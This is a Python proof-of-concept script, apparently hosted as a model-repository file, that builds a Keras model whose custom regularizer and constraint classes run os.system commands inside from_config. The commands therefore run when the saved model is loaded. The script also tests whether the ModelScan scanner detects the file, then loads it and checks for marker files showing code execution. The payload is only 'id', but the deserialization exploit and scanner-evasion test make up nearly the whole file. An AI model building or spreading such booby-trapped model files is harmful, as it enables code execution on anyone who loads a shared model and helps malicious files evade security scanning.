File size: 1,454 Bytes
9e64981
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
import tensorflow as tf, keras, os, sys

# Register both malicious classes
@keras.saving.register_keras_serializable(package='MyReg')
class BadReg(tf.keras.regularizers.L2):
    @classmethod
    def from_config(cls, config):
        import os; os.system('id > /tmp/REG_RCE')
        return super().from_config({'l2': 0.01})

@keras.saving.register_keras_serializable(package='MyConstr')
class BadConstr(tf.keras.constraints.MaxNorm):
    @classmethod
    def from_config(cls, config):
        import os; os.system('id > /tmp/CONSTRAINT_RCE')
        return super().from_config({'max_value': 2.0})

inputs = tf.keras.Input(shape=(5,))
x = tf.keras.layers.Dense(8, 
    kernel_regularizer=BadReg(0.01), 
    kernel_constraint=BadConstr(2.0),
    activation='relu')(inputs)
outputs = tf.keras.layers.Dense(1)(x)
model = tf.keras.Model(inputs, outputs)
model.save('model.keras')
print(f"Saved model.keras")

# ModelScan test
sys.path.insert(0, '/tmp/modelscan')
from modelscan.modelscan import ModelScan
from modelscan.settings import DEFAULT_SETTINGS
r = ModelScan(DEFAULT_SETTINGS).scan('model.keras')
print(f"ModelScan: I={len(r.get('issues',[]))} E={len(r.get('errors',[]))} S={len(r.get('skipped',[]))}")

del model, BadReg, BadConstr
import gc; gc.collect()
loaded = tf.keras.models.load_model('model.keras', safe_mode=False)
print(f"Regularizer RCE: {os.path.exists('/tmp/REG_RCE')}")
print(f"Constraint RCE: {os.path.exists('/tmp/CONSTRAINT_RCE')}")